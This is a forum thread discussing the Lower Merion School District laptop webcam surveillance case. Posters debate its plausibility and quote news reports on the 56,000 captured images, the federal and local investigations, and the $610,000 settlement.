I'll take it that UY has no intention of returning to this thread then.

For the record, I'm interested in his review of what I posted in regards to his own words below:

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

The significance of this is that such a software request would not be cheap, and it would be become widely known in the school district. It's just one more piece of evidence that says this story is most likely ********:
* There's no good reason to do it.
* It's clearly against the law.
* Any practical or official use of the information would expose the whole shebang.
* It's expensive.
* Too many people would be involved for it to stay secret.
* It's easily detected by anybody with a modicum of computer expertise.
* Everybody involved would lose their jobs and be subject to civil lawsuits if not criminal prosecution.

On the other hand, we have the word of one student who claims that the school took a picture of him doing something inappropriate in his home. Right. They were just sitting there watching him stand right in front of his laptop. They saw him misbehave, so they saved a snapshot at Computer Central. Then they called the kid into the office and said, "We saw what you did on you own private time at home. Here's our evidence [shows pic]. You didn't actually break any school rules, and I am opening myself up a civil lawsuit of epic proportions, but so what? I just wanted to let you know."

Anybody want to wager on how this story turns out?

Bolding mine.

Dude, it's clear Brave Sir Robin has gallantly chickened out and won't be returning, so, we can move on now. :D

Dude, it's clear Brave Sir Robin has gallantly chickened out and won't be returning, so, we can move on now. :D

Fair enough. Being the head on the far right side, I missed it. GrenME is on the left, so he may have seen it.

Ok so who's got legal expertise and can talk to that? I'm interested to hear about issues regarding school's rights to be parent in absentia extending to the home or whether this does infringe on wiretapping statutes.

So, no word yet from the FBI? or the other law enforcement agencies?

The school hasn't apologized to the kid, her family, and the other students? Nobody put on paid leave? Unpaid leave?

So, no word yet from the FBI? or the other law enforcement agencies?

The school hasn't apologized to the kid, her family, and the other students? Nobody put on paid leave? Unpaid leave?


The FBI made a formal statement saying they were investigating, as did the local DA. I think I linked to those upthread.

It's probably a little early for those entities to make any official pronouncements beyond that.

Mr. Born of Just Born Inc has publicly apologized for the dangerous and addictive nature of their product. He vowed to add a warning label to not consume his product on school property, while driving, or while within view of a web cam.*

*This is all a joke, don't go looking for Mr. Born's press release.

Fair enough. Being the head on the far right side, I missed it. GrenME is on the left, so he may have seen it.

Ok so who's got legal expertise and can talk to that? I'm interested to hear about issues regarding school's rights to be parent in absentia extending to the home or whether this does infringe on wiretapping statutes.

Well, I don't know for sure about Pennsylvania, but if the school were in New Jersey I could ensure that they'd breached a couple of statutes. On the federal level, I'm also fairly certain that there's at least a case that could be made against the school for breaches of privacy laws.

Chances are likely that te FBI is going to give the local authorities a crack at them first, and compare notes along the way in case they want to bring a case of their own. If memory serves, the FBI will probably offer to assist the state or local authorities in order for them to prosecute this on their own, and keep it from jumping into any federal courts. As such, state and local laws are gong to play pretty strongly into this.

Ok searching through EFF's site, they apparently have only released statements via the joint ACLU statement I linked to earlier. This is a shame, because I would like to see an in-depth review by the EFF of the merits of each point in the case.

The suit has its own wikipedia page: http://en.wikipedia.org/wiki/Blake_J._Robbins_v._Lower_Merion_School_District

The school district has suggested that Blake was in possession of a loaner laptop, because he had not paid a $55 insurance fee which would have permitted him to use one of the regular computers. In a 2009 letter to parents from Harriton principal Steven R. Kline stated, "no uninsured laptops are permitted off campus," and explained that students who had not paid the insurance fee could use one of the loaners. Asked if Robbins took a loaner computer home without authorization, Young declined to comment.[27] The Philadelphia Inquirer speculated that, if the loaner was considered missing, the circumstances might have prompted the district to activate the Web cam.[28] Haltzman denied that Blake was ever notified that his computer use was a problem, and stated that Blake had taken a computer home "every single day" for a month.[29]

http://www.philly.com/philly/news/breaking/20100416_The_Lower_Merion_School_District_today_ac knowledged_that_NO_HEAD_SPECIFIED.html

"
The Lower Merion School District today acknowledged that investigators reviewing its controversial laptop tracking program have recovered "a substantial number of webcam photos" and that they expect to soon start notifying parents whose children were photographed.
Responding to a motion filed Thursday as part of a lawsuit brought by the family of a Harriton High School sophomore, School Board President David Ebby said the district's lawyers have proposed enlisting Chief U.S. Magistrate Judge Thomas Rueter to supervise a system by which parents are to be notified and allowed to view the photos.
"We hope to start that process shortly," Ebby said in a statement addressed to parents and guardians and posted on the district's website. "During that process the privacy of all students will be strongly protected."
Ebby's comments came a day after a lawyer for Harriton sophomore Blake Robbins filed a motion in federal court asserting that the system had secretly captured "thousands of images of webcam pictures and screen shots," including photos of students, the Web sites they visited and excerpts of their online chats.
School officials have thus far declined to say how many students were photographed by the system, which was instituted in September 2008 to locate missing or stolen laptops. The district has commissioned an internal investigation and promises to release its results within a few weeks."

They're gonna burn..

link (http://www.thetechherald.com/article.php/201016/5526/School-district-says-56-000-photos-and-screenshots-taken-of-students)

According to several reports, including statements from LMSD, 56,000 images were taken by the district’s security software, capturing students in their homes.

56,000! That includes screenshots of text messaging, but still: WTF?

.. . . . . . . . . . . . .. . . . .
ETA: TechNewsWorld (http://www.technewsworld.com/story/69805.html?wlc=1271769946)
"The plaintiffs' Motion suggests that the LANRev tracking feature may have been used for the purposes of 'spying' on students," [school board president] Ebby added. "While we deeply regret the mistakes and misguided actions that have led us to this situation, at this late stage of the investigation we are not aware of any evidence that District employees used any LANRev webcam photographs or screenshots for such inappropriate purposes."

Well, I'm glad that the internal investigation showed that none of the 56,000 photos and screenshots were used for inappropriate spying on students. Although personally, I would define falsely accusing a student of using drugs to be an inappropriate purpose.



. . . . . . . . . . . . . . . . .

More ETA:
Clarification:

About 38,500 images - or almost two-thirds of the total number retrieved so far - came from six laptops that were reported missing from the Harriton gymnasium in September 2008. The tracking system continued to store images from those computers for nearly six months, until police recovered them and charged a suspect with theft in March 2009.

source (http://www.philly.com/inquirer/local/20100420_Lower_Merion_details_scope_of_Web-cam_surveillance.html)

A settlement has been reached (http://www.chicagotribune.com/news/chi-1011-laptop-ap-story,0,2746834.story):
A Philadelphia-area school district has agreed to pay $610,000 to settle two lawsuits over secret photos taken on school-issued laptops.

The Lower Merion School District admits it captured thousands of webcam photographs and screen shots from student laptops in a misguided effort to locate missing computers.

And contingency fees are now 70%? :eye-poppi
The settlement calls for $175,000 to be placed in a trust for Robbins and $10,000 for a second student who filed suit, Jalil Hassan. Their lawyer, Mark Haltzman, will get $425,000 for his work on the case.

Heh - I wonder what that comes to hourly?

I would not be surprised if most of the $470,000 was eaten up in research and expert witnesses rather than being entirely take home for the firm. It is not unheard of for law firms to front the money in these cases if there is an expectation of pay out and technology cases can be very expensive. I do not really expect a newspaper article to differentiate between the laywer's specific fees and all legal costs associated with the winning suit.

They're lucky nobody was criminally charged. The U.S. Attorney may have declined to file, but that's a long way from saying no crime was committed.